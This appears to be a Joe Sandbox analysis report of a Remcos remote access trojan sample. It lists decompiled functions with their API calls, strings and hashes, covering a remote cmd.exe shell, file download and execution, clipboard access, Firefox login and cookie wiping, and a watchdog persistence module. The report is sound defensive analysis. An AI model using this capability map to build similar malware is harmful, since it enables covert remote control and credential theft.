                                                                • Opcode Fuzzy Hash: 4470799dcfde6683a975b44515cd928480e6138ab46ed270d1b1aebcf1de6a3b
                                                                • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                                APIs
                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                                • GetLastError.KERNEL32 ref: 0040D0BE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateErrorLastMutex
                                                                • String ID: SG
                                                                • API String ID: 1925916568-3189917014
                                                                • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                                • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID:
                                                                • API String ID: 3677997916-0
                                                                • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                                • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                                APIs
                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F461
                                                                • _free.LIBCMT ref: 0044F49A
                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F4A1
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EnvironmentStrings$Free_free
                                                                • String ID:
                                                                • API String ID: 2716640707-0
                                                                • Opcode ID: 0f2961337cf6473c9b59c8633065eebaee8da3dc7e8e50693e042ad6422b7f19
                                                                • Instruction ID: 0fde98e0ac238faa149cd6f420f555edc5ad685e5938876998fddc3cfa248eb7
                                                                • Opcode Fuzzy Hash: 0f2961337cf6473c9b59c8633065eebaee8da3dc7e8e50693e042ad6422b7f19
                                                                • Instruction Fuzzy Hash: 41E0E537545A226BB211323A6C49D6F2A58CFD27B6726003BF40486242EE288D0641BA
                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
                                                                • RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID:
                                                                • API String ID: 3677997916-0
                                                                • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                                • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C1D7,00466C58), ref: 00413551
                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C1D7,00466C58), ref: 00413565
                                                                • RegCloseKey.KERNEL32(?,?,?,0040C1D7,00466C58), ref: 00413570
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID:
                                                                • API String ID: 3677997916-0
                                                                • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                                                • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                                                APIs
                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                • RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateValue
                                                                • String ID:
                                                                • API String ID: 1818849710-0
                                                                • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                                • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _wcslen
                                                                • String ID: pQG
                                                                • API String ID: 176396367-3769108836
                                                                • Opcode ID: 2909f1be4624e20aefd95f70af1697863fb55ab0ff45cf84c0a49d4b96723009
                                                                • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                                                • Opcode Fuzzy Hash: 2909f1be4624e20aefd95f70af1697863fb55ab0ff45cf84c0a49d4b96723009
                                                                • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                                                APIs
                                                                • _free.LIBCMT ref: 00446227
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap$_free
                                                                • String ID:
                                                                • API String ID: 1482568997-0
                                                                • Opcode ID: 1f917527c9cd9112a4c2ab4db5d8ca91a49e76957baa276bc02c381a5932faf2
                                                                • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                                                                • Opcode Fuzzy Hash: 1f917527c9cd9112a4c2ab4db5d8ca91a49e76957baa276bc02c381a5932faf2
                                                                • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
                                                                APIs
                                                                • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                  • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateEventStartupsocket
                                                                • String ID:
                                                                • API String ID: 1953588214-0
                                                                • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                                                • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                                • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                                • Opcode Fuzzy Hash: 9ebd29a8193938baf2c5ce5f6ec3a3ea5040e3c3e83895a942c6279db0e0dd98
                                                                • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                                APIs
                                                                  • Part of subcall function 00445B74: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000), ref: 00445BB5
                                                                • _free.LIBCMT ref: 004501C0
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap_free
                                                                • String ID:
                                                                • API String ID: 614378929-0
                                                                • Opcode ID: 60f99f4f74d771fb4a1326b0b926bb5a841854500e0a6ddc8464f8a9dc27050b
                                                                • Instruction ID: 1bf88885f7a62dfe3e195aa205353632c6f85cb380d5d404dcdd82bf2c99678c
                                                                • Opcode Fuzzy Hash: 60f99f4f74d771fb4a1326b0b926bb5a841854500e0a6ddc8464f8a9dc27050b
                                                                • Instruction Fuzzy Hash: DB014976200744ABE731CF6ACC42D5AFBD8EB85370F25062EE58483281EB34A909C779
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000), ref: 00445BB5
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                                                • Instruction ID: ef76d3429b2572ee2e16b707a9c356192af24cfd4e901c13b73aaad13af6506a
                                                                • Opcode Fuzzy Hash: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                                                • Instruction Fuzzy Hash: BEF0B431500F65ABBF222E22AC05E5B3769DB81770B14412BB914EA286CA38FC0186AC
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                                • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                                APIs
                                                                • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Startup
                                                                • String ID:
                                                                • API String ID: 724789610-0
                                                                • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                                                • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: send
                                                                • String ID:
                                                                • API String ID: 2809346765-0
                                                                • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                                                • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
                                                                APIs
                                                                • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                                • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                                • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                  • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                  • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                  • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                                • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                  • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                  • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                  • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                  • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                • Sleep.KERNEL32(000007D0), ref: 00408733
                                                                • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                                                  • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                • API String ID: 1067849700-181434739
                                                                • Opcode ID: d116e15542ec9ea566ddb8834446e92c621402b8b77c1a65adbef748b600aba7
                                                                • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                                • Opcode Fuzzy Hash: d116e15542ec9ea566ddb8834446e92c621402b8b77c1a65adbef748b600aba7
                                                                • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                                APIs
                                                                • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                • __Init_thread_footer.LIBCMT ref: 00405723
                                                                • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                                • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660D0,00000062,004660B4), ref: 004059E4
                                                                • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                                • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                • CloseHandle.KERNEL32 ref: 00405A23
                                                                • CloseHandle.KERNEL32 ref: 00405A2B
                                                                • CloseHandle.KERNEL32 ref: 00405A3D
                                                                • CloseHandle.KERNEL32 ref: 00405A45
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                • API String ID: 2994406822-18413064
                                                                • Opcode ID: 5497d89eb2bfe0b7b7afbdacb2e666ef99fa94f9d1fd0b450e67ad54fc0b207d
                                                                • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                                • Opcode Fuzzy Hash: 5497d89eb2bfe0b7b7afbdacb2e666ef99fa94f9d1fd0b450e67ad54fc0b207d
                                                                • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                                APIs
                                                                • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                  • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                  • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                                                • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                                • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                • API String ID: 3018269243-13974260
                                                                • Opcode ID: 868a51c02de72cecf5e4470023d2170e4a1c4714e6dee9bf4973fafcfeb68822
                                                                • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                                • Opcode Fuzzy Hash: 868a51c02de72cecf5e4470023d2170e4a1c4714e6dee9bf4973fafcfeb68822
                                                                • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                                APIs
                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                                • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                                • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$CloseFile$FirstNext
                                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                • API String ID: 1164774033-3681987949
                                                                • Opcode ID: 1dd2d77424a1feb7b81cbbfb01062b06d0993b8648acb28e4275aca406a32408
                                                                • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                                • Opcode Fuzzy Hash: 1dd2d77424a1feb7b81cbbfb01062b06d0993b8648acb28e4275aca406a32408
                                                                • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                                APIs
                                                                • OpenClipboard.USER32 ref: 004168FD
                                                                • EmptyClipboard.USER32 ref: 0041690B
                                                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                                • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                                • CloseClipboard.USER32 ref: 00416990
                                                                • OpenClipboard.USER32 ref: 00416997
                                                                • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                                • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                • CloseClipboard.USER32 ref: 004169BF
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                • String ID: !D@
                                                                • API String ID: 3520204547-604454484
                                                                • Opcode ID: a471b31b0e2848d44592c209c65a27511ae0bedd1fb0e9bf63a88f6136bceacb
                                                                • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                                • Opcode Fuzzy Hash: a471b31b0e2848d44592c209c65a27511ae0bedd1fb0e9bf63a88f6136bceacb
                                                                • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                                APIs
                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                                • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                                • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                                • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$Close$File$FirstNext
                                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                • API String ID: 3527384056-432212279
                                                                • Opcode ID: 0e02877a0a7a0854a613cb848fbdcbf87c912738fbad3b4f45ae5d99c19712fd
                                                                • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                                • Opcode Fuzzy Hash: 0e02877a0a7a0854a613cb848fbdcbf87c912738fbad3b4f45ae5d99c19712fd
                                                                • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
